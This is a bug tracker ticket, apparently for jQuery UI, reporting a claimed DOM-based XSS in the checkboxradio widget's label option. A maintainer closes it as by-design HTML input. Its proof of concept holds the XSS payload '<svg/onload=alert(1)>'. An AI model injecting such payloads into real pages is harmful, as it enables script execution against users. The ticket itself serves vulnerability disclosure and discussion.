Skip to main content

Search and Top Navigation

#15200 closed bug (notabug)

Opened June 06, 2017 01:16PM UTC

Closed June 06, 2017 01:26PM UTC

Last modified June 06, 2017 01:49PM UTC

Checkboxradio widget, label attribute DOM based XSS

Reported by: psych0tr1a Owned by:
Priority: minor Milestone: none
Component: ui.checkbxoradio Version: 1.12.1
Keywords: Cc:
Blocked by: Blocking:

Proof of concept:

<link rel="stylesheet" href="//">
<script src="//"></script>
<script src="//"></script>

  <legend>Select a Location: </legend>
  <label for="radio-1">New York</label>
  <input type="radio" name="radio-1" id="radio-1">
  <label for="radio-2">Paris</label>
  <input type="radio" name="radio-1" id="radio-2">
  <label for="radio-3">London</label>
  <input type="radio" name="radio-1" id="radio-3">
$( "input[type='radio']" ).checkboxradio({
  label: "<svg/onload=alert(1)>"
Attachments (0)
Change History (4)

Changed June 06, 2017 01:26PM UTC by scottgonzalez comment:1

resolution: → notabug
status: newclosed

That's not XSS. That's you explicitly inserting a script.

Changed June 06, 2017 01:29PM UTC by psych0tr1a comment:2

Sorry but you are absolutely wrong. Functionality means that there will be inserted text ane html, if the developers will use this functionality and there will be a user input then this is XSS.

Example of similar bug

Changed June 06, 2017 01:32PM UTC by psych0tr1a comment:3

Changed June 06, 2017 01:49PM UTC by scottgonzalez comment:4

Those are both text options, this is an HTML option.